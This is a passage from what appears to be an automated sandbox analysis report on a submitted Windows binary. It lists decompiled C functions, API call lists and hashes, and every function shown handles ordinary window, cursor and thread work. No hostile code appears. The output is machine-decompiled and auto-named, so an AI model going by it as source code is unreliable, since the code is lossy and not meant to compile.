					if(_t39 == 0 || (E00412B52(_v8) & 0x00000200) != 0 || (E00412B38(_v8) & 0x01000000) == 0) {
						_t41 = _v12 | 0x00000200;
					} else {
						_t41 = _v12 & 0xfffffdff;
					}
					if(_v12 == _t41) {
						goto L11;
					} else {
						RedrawWindow( *(_t45 + 0xe8), 0, 0, 0x81);
						SetWindowLongA( *(_t45 + 0xe8), 0xffffffec, _t41);
						SetWindowPos( *(_t45 + 0xe8), 0, 0, 0, 0, 0, 0x137);
						if(_a4 != 0) {
							GetClientRect( *(_t45 + 0xe8), _a4);
						}
						_t23 = 1;
					}
				} else {
					L11:
					_t23 = 0;
				}
				return _t23;
			}










                  0x00405117
                  0x00405118
                  0x0040511c
                  0x00405124
                  0x00405130
                  0x00405134
                  0x0040514d
                  0x00405152
                  0x00405180
                  0x00405172
                  0x00405175
                  0x00405175
                  0x00405189
                  0x00000000
                  0x0040518b
                  0x00405198
                  0x004051a7
                  0x004051bd
                  0x004051c6
                  0x004051d1
                  0x004051d1
                  0x004051d9
                  0x004051d9
                  0x004051dc
                  0x004051dc
                  0x004051dc
                  0x004051dc
                  0x004051e2

                  APIs
                    • Part of subcall function 0040474E: GetParent.USER32(?), ref: 0040475A
                    • Part of subcall function 0040474E: GetParent.USER32(00000000), ref: 0040475D
                  • GetWindowLongA.USER32 ref: 00405147
                  • RedrawWindow.USER32(?,00000000,00000000,00000081), ref: 00405198
                  • SetWindowLongA.USER32 ref: 004051A7
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137), ref: 004051BD
                  • GetClientRect.USER32 ref: 004051D1
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$LongParent$ClientRectRedraw
                  • String ID:
                  • API String ID: 556606033-0
                  • Opcode ID: 4ba79fdda7cda7382cc20deb3ffb3e4f90149cdee4478f17621874e7fee797b8
                  • Instruction ID: 7aaf3126d674e3e7048fbaf7b7e8ae3f530f56a6ff30dac5665c823baf7d5697
                  • Opcode Fuzzy Hash: 4ba79fdda7cda7382cc20deb3ffb3e4f90149cdee4478f17621874e7fee797b8
                  • Instruction Fuzzy Hash: F211D232900508FFDB206F65CC45FAFBA79EB81350F21463AF516BA1E0CA355D41CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040DBCC, Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 60%
                  			E0040DBCC(void* __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
				struct tagRECT _v20;
				int _t22;
				struct HWND__* _t23;
				struct HWND__* _t42;
				void* _t43;

				_t43 = __ecx;
				_t22 = IsWindowVisible( *(__ecx + 0x20));
				if(_t22 != 0 || _a12 != _t22 || _a16 != _t22) {
					_t23 = ScrollWindow( *(_t43 + 0x20), _a4, _a8, _a12, _a16);
				} else {
					_push(5);
					_push( *(_t43 + 0x20));
					while(1) {
						_t23 = GetWindow();
						_t42 = _t23;
						if(_t42 == 0) {
							break;
						}
						GetWindowRect(_t42,  &_v20);
						E00422BFB(_t43,  &_v20);
						SetWindowPos(_t42, 0, _v20.left + _a4, _v20.top + _a8, 0, 0, 0x15);
						_push(2);
						_push(_t42);
					}
				}
				if( *((intOrPtr*)(_t43 + 0x4c)) != 0 && _a12 == 0) {
					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x4c)))) + 0x5c))(_a4, _a8);
				}
				return _t23;
			}








                  0x0040dbd7
                  0x0040dbdc
                  0x0040dbe4
                  0x0040dc4f
                  0x0040dbf0
                  0x0040dbf6
                  0x0040dbf8
                  0x0040dc36
                  0x0040dc36
                  0x0040dc38
                  0x0040dc3c
                  0x00000000
                  0x00000000
                  0x0040dc02
                  0x0040dc0e
                  0x0040dc2d
                  0x0040dc33
                  0x0040dc35
                  0x0040dc35
                  0x0040dc3e
                  0x0040dc59
                  0x00000000
                  0x0040dc6e
                  0x0040dc75

                  APIs
                  • IsWindowVisible.USER32(?), ref: 0040DBDC
                  • GetWindowRect.USER32 ref: 0040DC02
                  • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 0040DC2D
                  • GetWindow.USER32(00000005,00000005), ref: 0040DC36
                  • ScrollWindow.USER32 ref: 0040DC4F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$RectScrollVisible
                  • String ID:
                  • API String ID: 2639402888-0
                  • Opcode ID: c6ae3ab3e4dfc37bb24cc7cc2e8b6ebdd03b97594dd71bc502e0e0f5d8dbd6e7
                  • Instruction ID: bf826b1d1b6a4b04d0006aacfa26414d2043573755bd92c3dfe28e5c2cba6bea
                  • Opcode Fuzzy Hash: c6ae3ab3e4dfc37bb24cc7cc2e8b6ebdd03b97594dd71bc502e0e0f5d8dbd6e7
                  • Instruction Fuzzy Hash: 14215E36600209BFDF258FA5CC48EBF77BAFB88310F04442AFA45A2290E7B4D811DB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00408A69, Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 72%
                  			E00408A69(void* __ecx, unsigned int _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t20;
				void* _t21;
				void* _t23;
				void* _t27;
				void* _t33;
				void* _t35;
				struct HWND__* _t36;

				_t28 = __ecx;
				_t35 = __ecx;
				if((E00412B38(__ecx) & 0x40000000) == 0) {
					_t28 = __ecx;
					_t27 = E0040F8D7(__ecx);
				} else {
					_t27 = __ecx;
				}
				_t38 = _t27;
				if(_t27 == 0) {
					E00406436(_t27, _t28, _t33, _t35, _t38);
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E00412C5B(_t27);
					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t27 == _t35) {
						SendMessageA( *(_t27 + 0x20), 0x86, 0, 0);
					} else {
						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) | 0x00000200;
						SendMessageA( *(_t27 + 0x20), 0x86, 1, 0);
						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) & 0xfffffdff;
					}
				}
				_push(5);
				_push(GetDesktopWindow());
				while(1) {
					_t20 = GetWindow();
					_t36 = _t20;
					if(_t36 == 0) {
						break;
					}
					_t21 = E00408105( *(_t27 + 0x20), _t36);
					__eflags = _t21;
					if(_t21 != 0) {
						SendMessageA(_t36, 0x36d, _a4, 0);
					}
					_push(2);
					_push(_t36);
				}
				return _t20;
			}














                  0x00408a69
                  0x00408a71
                  0x00408a7d
                  0x00408a83
                  0x00408a8a
                  0x00408a7f
                  0x00408a7f
                  0x00408a7f
                  0x00408a8c
                  0x00408a8e
                  0x00408a90
                  0x00408a90
                  0x00408a9f
                  0x00408aa3
                  0x00408ab3
                  0x00408ae7
                  0x00408abd
                  0x00408abd
                  0x00408ad0
                  0x00408ad2
                  0x00408ad2
                  0x00408ab3
                  0x00408ae9
                  0x00408af1
                  0x00408b11
                  0x00408b11
                  0x00408b17
                  0x00408b1b
                  0x00000000
                  0x00000000
                  0x00408af8
                  0x00408afd
                  0x00408aff
                  0x00408b0c
                  0x00408b0c
                  0x00408b0e
                  0x00408b10
                  0x00408b10
                  0x00408b21

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00408AD0
                  • SendMessageA.USER32(?,00000086,00000000,00000000), ref: 00408AE7
                  • GetDesktopWindow.USER32 ref: 00408AEB
                  • SendMessageA.USER32(00000000,0000036D,0000000C,00000000), ref: 00408B0C
                  • GetWindow.USER32(00000000), ref: 00408B11
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSendWindow$DesktopLong
                  • String ID:
                  • API String ID: 2272707703-0
                  • Opcode ID: db1c326b4e3218c1e5cb1ae0b208da50d9e98377f96e91c78ba2f68c648b6619
                  • Instruction ID: d32bd3ced13832ff189fd8f6ba1fa6c44edaf74d9e9f2573400e8018fbc2a9f8
                  • Opcode Fuzzy Hash: db1c326b4e3218c1e5cb1ae0b208da50d9e98377f96e91c78ba2f68c648b6619
                  • Instruction Fuzzy Hash: 3B11D03130071577EB316B568E46F9B3A19AF40764F16403FBA82796D1CEF9D8018EAC
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00409299, Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 65%
                  			E00409299(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, void* __eflags, struct HWND__* _a4, unsigned int _a8) {
				signed int _v8;
				char _v268;
				struct HWND__* _v272;
				intOrPtr _v276;
				void* __esi;
				void* __ebp;
				signed int _t22;
				int _t28;
				unsigned int _t48;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t60;

				_t52 = __edi;
				_t51 = __edx;
				_t42 = __ebx;
				_t58 = _t60;
				_t22 =  *0x463404; // 0x38a11573
				_v8 = _t22 ^ _t60;
				_push(_t54);
				_v276 = __ecx;
				_v272 = _a4;
				_t55 =  *((intOrPtr*)(E0041F363(__ebx, __edi, _t54, __eflags) + 4));
				if(_t55 != 0 && _a8 != 0) {
					_t48 = _a8 >> 0x10;
					if(_t48 != 0) {
						_t28 =  *(_t55 + 0x90) & 0x0000ffff;
						if(_a8 == _t28 && _t48 ==  *(_t55 + 0x92)) {
							_push(__ebx);
							_push(__edi);
							GlobalGetAtomNameA(_t28,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							GlobalGetAtomNameA( *(_t55 + 0x92) & 0x0000ffff,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							SendMessageA(_v272, 0x3e4,  *(_v276 + 0x20), ( *(_t55 + 0x92) & 0x0000ffff) << 0x00000010 |  *(_t55 + 0x90) & 0x0000ffff);
							_pop(_t52);
							_pop(_t42);
						}
					}
				}
				_pop(_t56);
				return E00430650(0, _t42, _v8 ^ _t58, _t51, _t52, _t56);
			}

















                  0x00409299
                  0x00409299
                  0x00409299
                  0x0040929c
                  0x004092a4
                  0x004092ab
                  0x004092b1
                  0x004092b2
                  0x004092b8
                  0x004092c3
                  0x004092c8
                  0x004092dc
                  0x004092e2
                  0x004092e8
                  0x004092f3
                  0x004092fe
                  0x004092ff
                  0x00409313
                  0x00409322
                  0x00409338
                  0x00409341
                  0x0040936b
                  0x00409371
                  0x00409372
                  0x00409372
                  0x004092f3
                  0x004092e2
                  0x0040937a
                  0x00409381

                  APIs
                  • GlobalGetAtomNameA.KERNEL32 ref: 00409313
                  • GlobalAddAtomA.KERNEL32 ref: 00409322
                  • GlobalGetAtomNameA.KERNEL32 ref: 00409338
                  • GlobalAddAtomA.KERNEL32 ref: 00409341
                  • SendMessageA.USER32(?,000003E4,?,?), ref: 0040936B
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AtomGlobal$Name$MessageSend
                  • String ID:
                  • API String ID: 1515195355-0
                  • Opcode ID: 1c6fcbf13093bb436f0e166c326a3b4a914807bfc1dca102e33d20fd3faa784b
                  • Instruction ID: fae6a2da03322e5916738b78c9740749d301d266a21dc2ce22a06b3a4c8b14c9
                  • Opcode Fuzzy Hash: 1c6fcbf13093bb436f0e166c326a3b4a914807bfc1dca102e33d20fd3faa784b
                  • Instruction Fuzzy Hash: 57216231900118AADB20DF69DC45BEAB3F8FB58700F00456AE99997181D7B8AE80CF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406DB6, Relevance: 7.6, APIs: 5, Instructions: 60windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00406DB6(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t24;
				unsigned int _t34;
				void* _t46;

				_t46 = __ecx;
				if(IsWindow( *(__ecx + 0x20)) == 0) {
					 *(_t46 + 0xb0) = _a4;
					 *(_t46 + 0xb4) = _a8;
					 *(_t46 + 0xa8) = _a12;
					_t24 = _a16;
					 *(_t46 + 0xac) = _t24;
					return _t24;
				}
				SendMessageA( *(_t46 + 0x20), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t46 + 0x20), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				if( *0x462630 >= 0x60000) {
					_t34 = SendMessageA( *(_t46 + 0x20), 0x43a, 0, 0);
					 *(_t46 + 0xb0) = _t34 & 0x0000ffff;
					 *(_t46 + 0xb4) = _t34 >> 0x10;
				}
				return InvalidateRect( *(_t46 + 0x20), 0, 1);
			}






                  0x00406dbc
                  0x00406dc9
                  0x00406e44
                  0x00406e4d
                  0x00406e56
                  0x00406e5c
                  0x00406e5f
                  0x00000000
                  0x00406e5f
                  0x00406dec
                  0x00406e05
                  0x00406e11
                  0x00406e1d
                  0x00406e25
                  0x00406e2b
                  0x00406e2b
                  0x00000000

                  APIs
                  • IsWindow.USER32(?), ref: 00406DC1
                  • SendMessageA.USER32(?,00000420,00000000,?), ref: 00406DEC
                  • SendMessageA.USER32(?,0000041F,00000000,?), ref: 00406E05
                  • SendMessageA.USER32(?,0000043A,00000000,00000000), ref: 00406E1D
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00406E37
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$InvalidateRectWindow
                  • String ID:
                  • API String ID: 3225880595-0
                  • Opcode ID: 8681fc28124b6b9a29a6d98b5f23533007bf2a326a10b3009479ffc3174121ec
                  • Instruction ID: 4717757c02217832fd9b412043661d7cdff3795e995a25a39b476dc6cc087278
                  • Opcode Fuzzy Hash: 8681fc28124b6b9a29a6d98b5f23533007bf2a326a10b3009479ffc3174121ec
                  • Instruction Fuzzy Hash: CD115EB5100318AFE7108F29CC84AB7B7E9FB44344F01452EF99AC2160D7B0AC50DB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403BB0, Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E00403BB0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
				intOrPtr _t19;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t51;
				void* _t52;
				intOrPtr _t53;
				void* _t54;
				void* _t55;

				_t48 = __edi;
				_t35 = __ebx;
				_push(__ecx);
				_t51 = __ecx;
				_t19 =  *((intOrPtr*)(__ecx + 0x70));
				 *((intOrPtr*)(__ecx)) = 0x44f12c;
				if(_t19 != 0) {
					_t47 =  *(_t19 + 0x2c);
					if(GetExitCodeThread( *(_t19 + 0x2c), _t55 + 4) != 0 &&  *(_t55 + 4) == 0x103) {
						_push(__edi);
						SetEvent( *(_t51 + 0xa4));
						SetEvent( *(_t51 + 0x9c));
						_t47 =  *(_t51 + 0xa8);
						WaitForSingleObject( *(_t51 + 0xa8), 0xffffffff);
						_pop(_t48);
					}
				}
				_t37 = _t51;
				_pop(_t52);
				_push(4);
				E00431A9B(E0044BAB5, _t35, _t48, _t52);
				_t53 = _t37;
				 *((intOrPtr*)(_t54 - 0x10)) = _t53;
				 *(_t54 - 4) = 3;
				E0041CF56(_t37);
				if( *((intOrPtr*)(_t53 + 0x28)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x28)))) + 0x60))(_t53);
				}
				 *(_t54 - 4) = 2;
				E004238A4(_t53 + 0x2c);
				E004010B0( *((intOrPtr*)(_t53 + 0x24)) - 0x10, _t47);
				E004010B0( *((intOrPtr*)(_t53 + 0x20)) - 0x10, _t47);
				 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
				return E00431B73(E004126F7(_t53));
			}











                  0x00403bb0
                  0x00403bb0
                  0x00403bb0
                  0x00403bb2
                  0x00403bb4
                  0x00403bb7
                  0x00403bbf
                  0x00403bc1
                  0x00403bd2
                  0x00403be4
                  0x00403bec
                  0x00403bf5
                  0x00403bf7
                  0x00403c00
                  0x00403c06
                  0x00403c06
                  0x00403bd2
                  0x00403c07
                  0x00403c09
                  0x0041d221
                  0x0041d228
                  0x0041d22d
                  0x0041d22f
                  0x0041d232
                  0x0041d239
                  0x0041d242
                  0x0041d24a
                  0x0041d24a
                  0x0041d250
                  0x0041d254
                  0x0041d25f
                  0x0041d26a
                  0x0041d26f
                  0x0041d27f

                  APIs
                  • GetExitCodeThread.KERNEL32(?,?), ref: 00403BCA
                  • SetEvent.KERNEL32(?), ref: 00403BEC
                  • SetEvent.KERNEL32(?), ref: 00403BF5
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00403C00
                  • __EH_prolog3.LIBCMT ref: 0041D228
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Event$CodeExitH_prolog3ObjectSingleThreadWait
                  • String ID:
                  • API String ID: 2381358199-0
                  • Opcode ID: fa545502d5acbd77844dd176f8f838e760c6e7bb0049e04f7fa1d7d70fb9b361
                  • Instruction ID: 2df0668fb81505498147826c0ba3f82a5f93b319f9ce905dcc0f13ec5cdeb1dd
                  • Opcode Fuzzy Hash: fa545502d5acbd77844dd176f8f838e760c6e7bb0049e04f7fa1d7d70fb9b361
                  • Instruction Fuzzy Hash: 6B11D270600200DBDB14EFB9C854AABB7E8BF48314F00462EF156932D1CBB8A941CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042A16F, Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042A16F(void* _a4, void* _a8) {
				void* _t7;
				DEVMODEA* _t8;
				struct HDC__* _t17;
				void* _t21;
				struct HDC__* _t25;
				signed short* _t28;

				if(_a4 != 0) {
					_t7 = GlobalLock(_a4);
					_t21 = _a8;
					_t28 = _t7;
					if(_t21 == 0) {
						_t8 = 0;
					} else {
						_t8 = GlobalLock(_t21);
					}
					if(_t28 != 0) {
						_t25 = CreateDCA(_t28 + ( *_t28 & 0x0000ffff), _t28 + (_t28[1] & 0x0000ffff), _t28 + (_t28[2] & 0x0000ffff), _t8);
						GlobalUnlock(_a4);
						if(_t21 != 0) {
							GlobalUnlock(_t21);
						}
						_t17 = _t25;
					} else {
						_t17 = 0;
					}
					return _t17;
				}
				return 0;
			}









                  0x0042a178
                  0x0042a18a
                  0x0042a18c
                  0x0042a18f
                  0x0042a193
                  0x0042a19a
                  0x0042a195
                  0x0042a196
                  0x0042a196
                  0x0042a19e
                  0x0042a1c8
                  0x0042a1ca
                  0x0042a1ce
                  0x0042a1d1
                  0x0042a1d1
                  0x0042a1d3
                  0x0042a1a0
                  0x0042a1a0
                  0x0042a1a0
                  0x00000000
                  0x0042a1d7
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: GlobalLock
                  • String ID:
                  • API String ID: 2848605275-0
                  • Opcode ID: 36197cb4c7bc65c2e10c633eec0bce1bffa3b1a8456a36caaa099f7416d8f53f
                  • Instruction ID: 2c7e1155eccb6f0b88d5b3aa029337c93f042f81e7a86a2626123610b555cf53
                  • Opcode Fuzzy Hash: 36197cb4c7bc65c2e10c633eec0bce1bffa3b1a8456a36caaa099f7416d8f53f
                  • Instruction Fuzzy Hash: 8E01D132300635ABC7215B6AEC44A377EDCEF887B1B544422BD49C3600D638CC30D6A9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004088DE, Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004088DE(void* __ecx) {
				struct tagMSG _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				int _t11;
				void* _t13;
				void* _t18;
				void* _t26;

				_t26 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x68)) != 0) {
					_t11 = PeekMessageA( &_v32,  *(__ecx + 0x20), 0x367, 0x367, 3);
					_t18 = PostMessageA;
					if(_t11 == 0) {
						PostMessageA( *(_t26 + 0x20), 0x367, 0, 0);
					}
					if(GetCapture() ==  *(_t26 + 0x20)) {
						ReleaseCapture();
					}
					_t13 = E0040F8D7(_t26);
					_t30 = _t13;
					if(_t13 == 0) {
						_t13 = E00406436(_t18, 0, 0x367, _t26, _t30);
					}
					 *((intOrPtr*)(_t26 + 0x68)) = 0;
					 *((intOrPtr*)(_t13 + 0x68)) = 0;
					return PostMessageA( *(_t26 + 0x20), 0x36a, 0, 0);
				}
				return _t9;
			}













                  0x004088e7
                  0x004088ed
                  0x00408901
                  0x00408907
                  0x0040890f
                  0x00408919
                  0x00408919
                  0x00408924
                  0x00408926
                  0x00408926
                  0x0040892e
                  0x00408935
                  0x00408937
                  0x00408939
                  0x00408939
                  0x00408940
                  0x00408948
                  0x00000000
                  0x00408951
                  0x00408954

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$CapturePost$PeekRelease
                  • String ID:
                  • API String ID: 1125932295-0
                  • Opcode ID: 63f601fcd40991cd7e0112b5e477cee5bb4eea0abaee055fc0908a0d71d373a2
                  • Instruction ID: 57fe4fcd219db2e76da600668b61a162516832e2059398302be7d6c9e2b70dbe
                  • Opcode Fuzzy Hash: 63f601fcd40991cd7e0112b5e477cee5bb4eea0abaee055fc0908a0d71d373a2
                  • Instruction Fuzzy Hash: 8A0167755006007FE7257B66DC59F2B7ABDFB85718F10493DF182A22E1EA74EC00C669
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041BBC8, Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E0041BBC8(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, char _a8) {
				struct tagPOINT _v12;
				void* __esi;
				void* __ebp;
				intOrPtr _t15;
				intOrPtr _t18;
				intOrPtr _t25;
				intOrPtr _t28;
				intOrPtr* _t30;

				_t25 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t31 = _a8 - 1;
				_t28 = __ecx;
				if(_a8 == 1) {
					GetCursorPos( &_v12);
					ScreenToClient( *(_t28 + 0x20),  &_v12);
					__eflags =  *((intOrPtr*)(_t28 + 0x10c)) - 2;
					if( *((intOrPtr*)(_t28 + 0x10c)) == 2) {
						L7:
						_push(LoadCursorA(0, 0x7f00));
					} else {
						_t18 = E0041B982(_t28, _t25,  &_v12,  &_a8);
						__eflags = _t18;
						if(_t18 == 0) {
							goto L7;
						} else {
							_t30 = _t28 + 0x120;
							__eflags =  *_t30;
							if(__eflags == 0) {
								 *_t30 = LoadCursorA( *(E0041F363(__ebx, __edi, _t30, __eflags) + 0xc), 0x7902);
							}
							_push( *_t30);
						}
					}
					SetCursor();
					_t15 = 0;
					__eflags = 0;
				} else {
					_t15 = E0040ED96(__ecx, _t31);
				}
				return _t15;
			}











                  0x0041bbc8
                  0x0041bbcd
                  0x0041bbce
                  0x0041bbcf
                  0x0041bbd4
                  0x0041bbd6
                  0x0041bbe3
                  0x0041bbf0
                  0x0041bbf6
                  0x0041bbfd
                  0x0041bc37
                  0x0041bc44
                  0x0041bbff
                  0x0041bc09
                  0x0041bc0e
                  0x0041bc10
                  0x00000000
                  0x0041bc12
                  0x0041bc12
                  0x0041bc18
                  0x0041bc1b
                  0x0041bc31
                  0x0041bc31
                  0x0041bc33
                  0x0041bc33
                  0x0041bc10
                  0x0041bc45
                  0x0041bc4b
                  0x0041bc4b
                  0x0041bbd8
                  0x0041bbd8
                  0x0041bbd8
                  0x0041bc4f

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Cursor$ClientLoadScreen
                  • String ID:
                  • API String ID: 120721131-0
                  • Opcode ID: fb1ddc07927ca9ebcf9fd8110f4b45202ba53c99b5186e5047645b8d000ed84a
                  • Instruction ID: 0d910c33cf9fb54be0f59747509cc5bad96e2f9c52cf35ee929d1a0e5e03e210
                  • Opcode Fuzzy Hash: fb1ddc07927ca9ebcf9fd8110f4b45202ba53c99b5186e5047645b8d000ed84a
                  • Instruction Fuzzy Hash: 32015E75514209EFDB209BA1CC09EDA77ACFF05315F00446AF546D2250EB789984CF99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041B503, Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0041B503(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t31;
				struct HICON__** _t38;
				intOrPtr _t40;
				void* _t41;

				_push(4);
				E00431A9B(E0044B922, __ebx, __edi, __esi);
				_t40 = __ecx;
				 *((intOrPtr*)(_t41 - 0x10)) = __ecx;
